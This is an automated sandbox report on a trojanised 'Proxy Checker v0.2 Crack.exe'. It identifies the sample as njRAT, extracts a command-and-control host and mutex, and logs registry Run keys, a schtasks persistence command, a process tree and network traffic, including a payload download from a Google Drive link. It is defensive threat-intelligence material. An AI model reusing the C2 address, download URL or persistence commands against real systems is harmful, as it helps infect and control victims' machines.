njrat | afaf9770608b7ba29f183586c580fc8093a2efdd68febff71122ac41cedae49d

Analysis

max time kernel
149s
max time network
147s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
19/09/2024, 02:27 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Proxy Checker v0.2/Proxy Checker v0.2 Crack.exe
Size

1.1MB
MD5

c23fa9a76be0e91ae95ab347e68a8a17
SHA1

3e8fee7b1729113fa86d53e7eb7135b32d50da96
SHA256

b0356479bb707ba0be06277723150e0401960783d21ab1a97fe76d6723546022
SHA512

6634aac9cb6abbe348fe5befeb1218ed0937713570190a2a1ea05da1b959a17f722eeff5d27d3464ba3f3cf19986d1364cb73b71de76997d99df82ebdb3512eb
SSDEEP

12288:lMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9eZLtL0ERDyKj:lnsJ39LyjbJkQFMhmC+6GD9ItwERDF

Score

10^/10

njrat hacked discovery persistence trojan

Malware Config

Extracted

Family

njrat

Version

0.7 MultiHost

Botnet

HacKed

fgtgd33333.ddns.net:1177

Mutex

8746d62c81bb0c573a0a1086f9955c7b

Attributes

reg_key
8746d62c81bb0c573a0a1086f9955c7b
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CCleaner.lnk	svchost.exe

Executes dropped EXE 6 IoCs

pid	Process
3016	._cache_Proxy Checker v0.2 Crack.exe
2768	Synaptics.exe
1484	._cache_Synaptics.exe
2152	svchost.exe
2544	svchost.exe
1472	svchost.exe

Loads dropped DLL 5 IoCs

pid	Process
2884	Proxy Checker v0.2 Crack.exe
2884	Proxy Checker v0.2 Crack.exe
2884	Proxy Checker v0.2 Crack.exe
2768	Synaptics.exe
2768	Synaptics.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8746d62c81bb0c573a0a1086f9955c7b = "\"C:\\Users\\Public\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	Proxy Checker v0.2 Crack.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\8746d62c81bb0c573a0a1086f9955c7b = "\"C:\\Users\\Public\\svchost.exe\" .."	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Proxy Checker v0.2 Crack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1952	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1804	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe
Token: 33	2152	svchost.exe
Token: SeIncBasePriorityPrivilege	2152	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1804	EXCEL.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2884 wrote to memory of 3016	2884	Proxy Checker v0.2 Crack.exe	30
PID 2884 wrote to memory of 3016	2884	Proxy Checker v0.2 Crack.exe	30
PID 2884 wrote to memory of 3016	2884	Proxy Checker v0.2 Crack.exe	30
PID 2884 wrote to memory of 3016	2884	Proxy Checker v0.2 Crack.exe	30
PID 2884 wrote to memory of 2768	2884	Proxy Checker v0.2 Crack.exe	31
PID 2884 wrote to memory of 2768	2884	Proxy Checker v0.2 Crack.exe	31
PID 2884 wrote to memory of 2768	2884	Proxy Checker v0.2 Crack.exe	31
PID 2884 wrote to memory of 2768	2884	Proxy Checker v0.2 Crack.exe	31
PID 2768 wrote to memory of 1484	2768	Synaptics.exe	32
PID 2768 wrote to memory of 1484	2768	Synaptics.exe	32
PID 2768 wrote to memory of 1484	2768	Synaptics.exe	32
PID 2768 wrote to memory of 1484	2768	Synaptics.exe	32
PID 3016 wrote to memory of 2152	3016	._cache_Proxy Checker v0.2 Crack.exe	37
PID 3016 wrote to memory of 2152	3016	._cache_Proxy Checker v0.2 Crack.exe	37
PID 3016 wrote to memory of 2152	3016	._cache_Proxy Checker v0.2 Crack.exe	37
PID 2152 wrote to memory of 1952	2152	svchost.exe	38
PID 2152 wrote to memory of 1952	2152	svchost.exe	38
PID 2152 wrote to memory of 1952	2152	svchost.exe	38
PID 992 wrote to memory of 2544	992	taskeng.exe	41
PID 992 wrote to memory of 2544	992	taskeng.exe	41
PID 992 wrote to memory of 2544	992	taskeng.exe	41
PID 992 wrote to memory of 1472	992	taskeng.exe	42
PID 992 wrote to memory of 1472	992	taskeng.exe	42
PID 992 wrote to memory of 1472	992	taskeng.exe	42

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Proxy Checker v0.2\Proxy Checker v0.2 Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Proxy Checker v0.2\Proxy Checker v0.2 Crack.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2884
- C:\Users\Admin\AppData\Local\Temp\Proxy Checker v0.2\._cache_Proxy Checker v0.2 Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\Proxy Checker v0.2\._cache_Proxy Checker v0.2 Crack.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3016
- - C:\Users\Public\svchost.exe
    "C:\Users\Public\svchost.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2152
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn Skype /tr "C:\Users\Public\svchost.exe
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1952
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Users\Admin\AppData\Local\Temp\Proxy Checker v0.2\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\Proxy Checker v0.2\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    PID:1484

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1804

C:\Windows\system32\taskeng.exe
taskeng.exe {387359D2-1616-4CD4-B180-4D2A489A267C} S-1-5-21-1506706701-1246725540-2219210854-1000:MUYDDIIS\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:992
- C:\Users\Public\svchost.exe
  C:\Users\Public\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2544
- C:\Users\Public\svchost.exe
  C:\Users\Public\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1472

Network

DNS

xred.mooo.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

xred.mooo.com

IN A

Response
DNS

freedns.afraid.org

Synaptics.exe

Remote address:

8.8.8.8:53

Request

freedns.afraid.org

IN A

Response

freedns.afraid.org

IN A

69.42.215.252
GET

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Synaptics.exe

Remote address:

69.42.215.252:80

Request

GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 19 Sep 2024 02:27:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
DNS

fgtgd33333.ddns.net

svchost.exe

Remote address:

8.8.8.8:53

Request

fgtgd33333.ddns.net

IN A

Response

fgtgd33333.ddns.net

IN A

0.0.0.0
DNS

docs.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.200.14
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.200.14:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 19 Sep 2024 02:28:41 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-QZ9elGmTCgZXy-z5A9g1vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.200.14:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=517=DOMte-OfE4pff7-sDC5LTXnecpCBqBbmOAkbcgWWMbGTz8RcwzvyNzL-iz2zXZ2mYwzA-djTvxGf_JOnDcEvumg_y_Gb1UicByHN3AwF_8gs3e77G8JR1j_rmbtM1ZEdW8vlwWHxZSKN8KF7l9HEIUgV7Bj4m7Z8CpI1kR8jnpbnzR4

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 19 Sep 2024 02:28:42 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-A36mXO_ae0UttuWdZo3k6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.200.14:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=517=DOMte-OfE4pff7-sDC5LTXnecpCBqBbmOAkbcgWWMbGTz8RcwzvyNzL-iz2zXZ2mYwzA-djTvxGf_JOnDcEvumg_y_Gb1UicByHN3AwF_8gs3e77G8JR1j_rmbtM1ZEdW8vlwWHxZSKN8KF7l9HEIUgV7Bj4m7Z8CpI1kR8jnpbnzR4

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 19 Sep 2024 02:28:42 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-QrMDrH__-s8NsSshEkUoRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

c.pki.goog

Synaptics.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.187.227
GET

http://c.pki.goog/r/r1.crl

Synaptics.exe

Remote address:

142.250.187.227:80

Request

GET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 19 Sep 2024 02:22:35 GMT
Expires: Thu, 19 Sep 2024 03:12:35 GMT
Cache-Control: public, max-age=3000
Age: 366
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

o.pki.goog

Synaptics.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.187.227
GET

http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D

Synaptics.exe

Remote address:

142.250.187.227:80

Request

GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEY%2BBbWicZDJCutGRyts3so%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Thu, 19 Sep 2024 01:38:28 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 3013
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDdY7t7sQcUFRCLMbD9m7%2FC

Synaptics.exe

Remote address:

142.250.187.227:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDdY7t7sQcUFRCLMbD9m7%2FC HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Thu, 19 Sep 2024 01:49:40 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 2342
DNS

drive.usercontent.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

142.250.187.225
GET

https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.187.225:443

Request

GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Connection: Keep-Alive
Cache-Control: no-cache
Host: drive.usercontent.google.com

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 19 Sep 2024 02:28:42 GMT
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-3nqYC0vtf3B5YHAX1qAZdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Length: 1652
X-GUploader-UploadID: AD-8ljtyOfbs6J9T9L5J5xvKkoGqWdGBFFGWB4RszLTRHtnoxUDc3G22gWKrAJ6x_D4m5yEN4Bo
Server: UploadServer
Set-Cookie: NID=517=DOMte-OfE4pff7-sDC5LTXnecpCBqBbmOAkbcgWWMbGTz8RcwzvyNzL-iz2zXZ2mYwzA-djTvxGf_JOnDcEvumg_y_Gb1UicByHN3AwF_8gs3e77G8JR1j_rmbtM1ZEdW8vlwWHxZSKN8KF7l9HEIUgV7Bj4m7Z8CpI1kR8jnpbnzR4; expires=Fri, 21-Mar-2025 02:28:42 GMT; path=/; domain=.google.com; HttpOnly
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
GET

https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.187.225:443

Request

GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: drive.usercontent.google.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: NID=517=DOMte-OfE4pff7-sDC5LTXnecpCBqBbmOAkbcgWWMbGTz8RcwzvyNzL-iz2zXZ2mYwzA-djTvxGf_JOnDcEvumg_y_Gb1UicByHN3AwF_8gs3e77G8JR1j_rmbtM1ZEdW8vlwWHxZSKN8KF7l9HEIUgV7Bj4m7Z8CpI1kR8jnpbnzR4

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 19 Sep 2024 02:28:42 GMT
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-ysm1iEXKEk-VW6a77HA91w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Length: 1652
X-GUploader-UploadID: AD-8ljv1AUEuJaIw8tbXI6vffMWvZad-gsHgo6RStNIC7ltswK3NrbGpuIQzAR1fUJvppP9Mm98
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
GET

https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.187.225:443

Request

GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: drive.usercontent.google.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: NID=517=DOMte-OfE4pff7-sDC5LTXnecpCBqBbmOAkbcgWWMbGTz8RcwzvyNzL-iz2zXZ2mYwzA-djTvxGf_JOnDcEvumg_y_Gb1UicByHN3AwF_8gs3e77G8JR1j_rmbtM1ZEdW8vlwWHxZSKN8KF7l9HEIUgV7Bj4m7Z8CpI1kR8jnpbnzR4

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Thu, 19 Sep 2024 02:28:43 GMT
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-PkM7-7KuRP-qybpufQ_luA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Length: 1652
X-GUploader-UploadID: AD-8ljv5g5jOTZWbGwuMUxYu0ntKlrAZWnfJs9Jqzog7gqrejL-vzKMRR8rgLSJuwClCZ1eqvyQ
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
DNS

crl.microsoft.com

Remote address:

8.8.8.8:53

Request

crl.microsoft.com

IN A

Response

crl.microsoft.com

IN CNAME

crl.www.ms.akadns.net

crl.www.ms.akadns.net

IN CNAME

a1363.dscg.akamai.net

a1363.dscg.akamai.net

IN A

92.123.142.59

a1363.dscg.akamai.net

IN A

92.123.143.234
GET

http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

Remote address:

92.123.142.59:80

Request

GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 01 May 2024 09:28:59 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com

Response

HTTP/1.1 200 OK

Content-Length: 1036
Content-Type: application/octet-stream
Content-MD5: 5xIscz+eN7ugykyYXOEdbQ==
Last-Modified: Thu, 11 Jul 2024 01:45:51 GMT
ETag: 0x8DCA14B323B2CC0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5fc09696-301e-0053-5f42-d374de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Thu, 19 Sep 2024 02:29:12 GMT
Connection: keep-alive
DNS

www.microsoft.com

Remote address:

8.8.8.8:53

Request

www.microsoft.com

IN A

Response

www.microsoft.com

IN CNAME

www.microsoft.com-c-3.edgekey.net

www.microsoft.com-c-3.edgekey.net

IN CNAME

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

IN CNAME

e13678.dscb.akamaiedge.net

e13678.dscb.akamaiedge.net

IN A

95.100.245.144
GET

http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

Remote address:

95.100.245.144:80

Request

GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 03 Jun 2024 21:25:24 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com

Response

HTTP/1.1 200 OK

Content-Length: 1078
Content-Type: application/octet-stream
Content-MD5: cyz+t2uRxNE5eKALjGZu1w==
Last-Modified: Sun, 18 Aug 2024 00:23:49 GMT
ETag: 0x8DCBF1C07FCB4BF
x-ms-request-id: e6150cee-901e-0017-5408-f1fee1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Thu, 19 Sep 2024 02:29:12 GMT
Connection: keep-alive
TLS_version: UNKNOWN
ms-cv: CASMicrosoftCV58d0c1d7.0
ms-cv-esi: CASMicrosoftCV58d0c1d7.0
X-RTag: RT

69.42.215.252:80

